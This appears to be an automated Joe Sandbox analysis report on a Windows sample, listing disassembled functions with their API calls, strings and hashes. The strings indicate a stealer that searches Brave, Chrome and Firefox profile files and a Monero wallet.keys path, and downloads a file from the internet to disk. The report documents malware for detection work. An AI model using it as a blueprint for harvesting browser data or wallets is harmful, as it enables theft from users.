Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
API String ID: 3334442632-726946144
Opcode ID: 34b7caeb6351d58552ad50165b5aca4c0f037dca01fa1980afc04af401e5b2fc
Instruction ID: 1b16cfb65bda5fa7047d466dbf598627a8163d3dc718a5f017166b25438b9194
Opcode Fuzzy Hash: 34b7caeb6351d58552ad50165b5aca4c0f037dca01fa1980afc04af401e5b2fc
Instruction Fuzzy Hash: 004235729201049BCB14FF70DD96EEE737DAF94300F404569B90AA7181EE349BA9CF96

Function 6C5B35A0 Relevance: 37.0, APIs: 16, Strings: 5, Instructions: 294
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InitializeCriticalSectionAndSpinCount.KERNEL32(6C63F688,00001000), ref: 6C5B35D5
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_TIMESTAMP_MODE), ref: 6C5B35E0
QueryPerformanceFrequency.KERNEL32(?), ref: 6C5B35FD
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C5B363F
GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C5B369F
__aulldiv.LIBCMT ref: 6C5B36E4
QueryPerformanceCounter.KERNEL32(?), ref: 6C5B3773
EnterCriticalSection.KERNEL32(6C63F688), ref: 6C5B377E
LeaveCriticalSection.KERNEL32(6C63F688), ref: 6C5B37BD
QueryPerformanceCounter.KERNEL32(?), ref: 6C5B37C4
EnterCriticalSection.KERNEL32(6C63F688), ref: 6C5B37CB
LeaveCriticalSection.KERNEL32(6C63F688), ref: 6C5B3801
__aulldiv.LIBCMT ref: 6C5B3883
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,QPC), ref: 6C5B3902
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,GTC), ref: 6C5B3918
_strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,AuthcAMDenti,0000000C), ref: 6C5B394C

Strings

GenuntelineI, xrefs: 6C5B3639
MOZ_TIMESTAMP_MODE, xrefs: 6C5B35DB
GTC, xrefs: 6C5B3912
QPC, xrefs: 6C5B38FC
AuthcAMDenti, xrefs: 6C5B3946

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: CriticalSection$PerformanceQuery$CounterEnterLeave__aulldiv_strnicmpstrcmp$AdjustmentCountFrequencyInitializeSpinSystemTimegetenv
String ID: AuthcAMDenti$GTC$GenuntelineI$MOZ_TIMESTAMP_MODE$QPC
API String ID: 301339242-3790311718
Opcode ID: 7d1b4d9b275dcf27bb7d56e9cf90961da9362f12cd97b0c371c52c705ec2f152
Instruction ID: d01a51fc7a29ef32eaa2c0e05ceae2bce9ec70835ccb3b6988f43655951c53fc
Opcode Fuzzy Hash: 7d1b4d9b275dcf27bb7d56e9cf90961da9362f12cd97b0c371c52c705ec2f152
Instruction Fuzzy Hash: E2B1C671B093109FDB18DF2AC89461A7BF5EB8A700F04992DE89DE3350DB309D058B9A

Function 00264910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wsprintfA.USER32 ref: 0026492C
FindFirstFileA.KERNEL32(?,?), ref: 00264943
StrCmpCA.SHLWAPI(?,00270FDC), ref: 00264971
StrCmpCA.SHLWAPI(?,00270FE0), ref: 00264987
FindNextFileA.KERNEL32(000000FF,?), ref: 00264B7D
FindClose.KERNEL32(000000FF), ref: 00264B92

Strings

%s\*, xrefs: 00264920
%s\%s, xrefs: 002649A4
%s\%s, xrefs: 002649FB

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s$%s\%s$%s\*
API String ID: 180737720-445461498
Opcode ID: 8f96029de3d31f0376e02474760f5c40b2594d2651bfe734ee44f12a90f7d554
Instruction ID: 73ef6224af97400b69797edbbc4cdedaee8501bc10b389fa9c450edb87114fd1
Opcode Fuzzy Hash: 8f96029de3d31f0376e02474760f5c40b2594d2651bfe734ee44f12a90f7d554
Instruction Fuzzy Hash: C26165B1910218ABCB20FFA0DC85EEA737CBB59301F0485A9F54D96141EB70DBA9CF95

Function 00263EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00263EC3
FindFirstFileA.KERNEL32(?,?), ref: 00263EDA
StrCmpCA.SHLWAPI(?,00270FAC), ref: 00263F08
StrCmpCA.SHLWAPI(?,00270FB0), ref: 00263F1E
FindNextFileA.KERNEL32(000000FF,?), ref: 0026406C
FindClose.KERNEL32(000000FF), ref: 00264081

Strings

%s\%s, xrefs: 00263EB7

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 03153d76df82ef7c2c20aea115ff8d09dee0a92f083876b554dda1389abd5a5e
Instruction ID: f7d134032d23e1a8d9953c280cf4dbefcd4a3df592e1fcbc7faa8ed34dd25168
Opcode Fuzzy Hash: 03153d76df82ef7c2c20aea115ff8d09dee0a92f083876b554dda1389abd5a5e
Instruction Fuzzy Hash: 7D5199B1920218ABCB24FBB0DC85EEA737CBB54300F404599F65992040EB75DBE9CF95

Function 0025F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002715B8,00270D96), ref: 0025F71E
StrCmpCA.SHLWAPI(?,002715BC), ref: 0025F76F
StrCmpCA.SHLWAPI(?,002715C0), ref: 0025F785
FindNextFileA.KERNELBASE(000000FF,?), ref: 0025FAB1
FindClose.KERNEL32(000000FF), ref: 0025FAC3

Strings

prefs.js, xrefs: 0025F812

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: b863b016110ea3b506f2deac526c3a2ba58e27038a816baa9e5e9c9d9eeddfb6
Instruction ID: 7a76b4db7e0917324325c6d845888d8f18193fc82411b50b8c1a174f1b509649
Opcode Fuzzy Hash: b863b016110ea3b506f2deac526c3a2ba58e27038a816baa9e5e9c9d9eeddfb6
Instruction Fuzzy Hash: 4EB17A719201049BCB24FF60DD96FEE7379AF54300F4081A9E90AA7141EF306BA9CF96

Function 002516D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0027510C,?,?,?,002751B4,?,?,00000000,?,00000000), ref: 00251923
StrCmpCA.SHLWAPI(?,0027525C), ref: 00251973
StrCmpCA.SHLWAPI(?,00275304), ref: 00251989
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00251D40
DeleteFileA.KERNEL32(00000000), ref: 00251DCA
FindNextFileA.KERNEL32(000000FF,?), ref: 00251E20
FindClose.KERNEL32(000000FF), ref: 00251E32

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

Strings

\*.*, xrefs: 002517F1

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 9288d3db3381baeb5c8cdbf3ae4e700c49f6293654a44143eb11c8d617ed3aa0
Instruction ID: 3755a5b74b6d345017812d0521ca2e1fc462eba13f616910147020e5d7df57c9
Opcode Fuzzy Hash: 9288d3db3381baeb5c8cdbf3ae4e700c49f6293654a44143eb11c8d617ed3aa0
Instruction Fuzzy Hash: 2012CD719311189BDB19FB60CC96AEE7378AF54300F5042A9A50A77091EF706FE9CFA1

Function 0025DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A740: lstrcpy.KERNEL32(00270E17,00000000), ref: 0026A788

Part of subcall function 0026A920: lstrcpy.KERNEL32(00000000,?), ref: 0026A972
Part of subcall function 0026A920: lstrcat.KERNEL32(00000000), ref: 0026A982

Part of subcall function 0026A9B0: lstrlen.KERNEL32(?,00D49078,?,\Monero\wallet.keys,00270E17), ref: 0026A9C5
Part of subcall function 0026A9B0: lstrcpy.KERNEL32(00000000), ref: 0026AA04
Part of subcall function 0026A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0026AA12

Part of subcall function 0026A8A0: lstrcpy.KERNEL32(?,00270E17), ref: 0026A905

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,002714B0,00270C2A), ref: 0025DAEB
StrCmpCA.SHLWAPI(?,002714B4), ref: 0025DB33
StrCmpCA.SHLWAPI(?,002714B8), ref: 0025DB49
FindNextFileA.KERNELBASE(000000FF,?), ref: 0025DDCC
FindClose.KERNEL32(000000FF), ref: 0025DDDE

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 31f5eb92fc9d27b24493a87cff04fe38a5f97392211f8071321d7e66f94c0bf7
Instruction ID: 3a7414238641b916fab457aa7ad9c6a6c4a00d2474f7c7c68f2c82386d92edbf
Opcode Fuzzy Hash: 31f5eb92fc9d27b24493a87cff04fe38a5f97392211f8071321d7e66f94c0bf7
Instruction Fuzzy Hash: 6A9122729201049BCB14FF70EC969ED737DAB94301F408669F90AA6181EE349B7DCF96

Function 002560A0 Relevance: 13.6, APIs: 9, Instructions: 133networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0026A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0026A7E6

Part of subcall function 002547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00254839
Part of subcall function 002547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00254849

InternetOpenA.WININET(00270DF7,00000001,00000000,00000000,00000000), ref: 0025610F
StrCmpCA.SHLWAPI(?,00D4EAC8), ref: 00256147
InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0025618F
CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 002561B3
InternetReadFile.WININET(?,?,00000400,?), ref: 002561DC
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0025620A
CloseHandle.KERNEL32(?,?,00000400), ref: 00256249
InternetCloseHandle.WININET(?), ref: 00256253
InternetCloseHandle.WININET(00000000), ref: 00256260

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

